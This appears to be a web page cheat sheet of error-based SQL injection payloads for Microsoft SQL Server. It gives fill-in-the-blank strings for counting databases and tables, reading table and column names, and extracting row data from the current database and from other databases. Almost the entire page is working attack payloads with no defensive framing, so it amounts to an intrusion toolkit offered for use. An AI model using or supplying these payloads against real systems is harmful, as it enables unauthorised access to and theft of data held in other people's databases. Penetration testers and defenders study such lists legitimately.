Skip to content

Error-Based SQLi – Method 1

Current DB Enumeration

Enumerate number of databases
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))--
Extract database name by number - Method 1
1 AND 1=CONVERT(INT,db_name(<database_#>))--
  • <database_#>
Extract database name by number - Method 2
1 AND 1=CONVERT(INT,(SELECT CAST(name AS nvarchar(4000)) FROM master..sysdatabases WHERE dbid=<database_#>))--
  • <database_#>
Extra table count from current DB
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))--
Extract table names from current DB
1 AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top <increase_#_starting_with_1> TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))--
  • <increase_#_starting_with_1>
Extract column names from a table in current DB
1 AND 1=CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 column_name FROM (SELECT DISTINCT top <increase_#_starting_with_1> column_name FROM information_schema.COLUMNS WHERE TABLE_NAME='<table_name>' ORDER BY column_name ASC) sq ORDER BY column_name DESC)+CHAR(58)))--
  • <increase_#_starting_with_1>
  • <table_name>
Extract number of rows in a table in current DB
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM <table_name>)+CHAR(58)+CHAR(58)))--

<table_name>

Extract data for two columns by row #
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 <column_1>+CHAR(58)+<column_2> FROM (SELECT top <increase_#_starting_with_1> <column_1> , <column_2> FROM <table_1> ORDER BY <column_1> ASC) sq ORDER BY <column_1> DESC)+CHAR(58)+CHAR(58)))--

<column_1> <column_2> <increase_#_starting_with_1> <table_1>

Other DB Enumeration

Extract tables from other DB
1 AND 1=CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top <increase_#_starting_with_1> TABLE_NAME FROM <other_db_name>.information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))--

<increase_#_starting_with_1> <other_db_name>

Enumerate columns from table from other DB
1 AND 1=CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 column_name FROM (SELECT DISTINCT top <increase_#_starting_with_1> column_name FROM <database>.information_schema.COLUMNS WHERE TABLE_NAME='<table>' ORDER BY column_name ASC) sq ORDER BY column_name DESC)+CHAR(58)))--

<increase_#_starting_with_1> <database> <table>

Extract number of rows in table from other DB
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM [<database>]..[<table>] )+CHAR(58)+CHAR(58)))--

<database> <table>

Extract data from table in other DB
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 <column> FROM (SELECT top <increase_#_starting_with_1> <column> FROM <database>..<table> ORDER BY <column> ASC) sq ORDER BY <column> DESC)+CHAR(58)+CHAR(58)))--

<increase_#_starting_with_1> <column> <database> <table>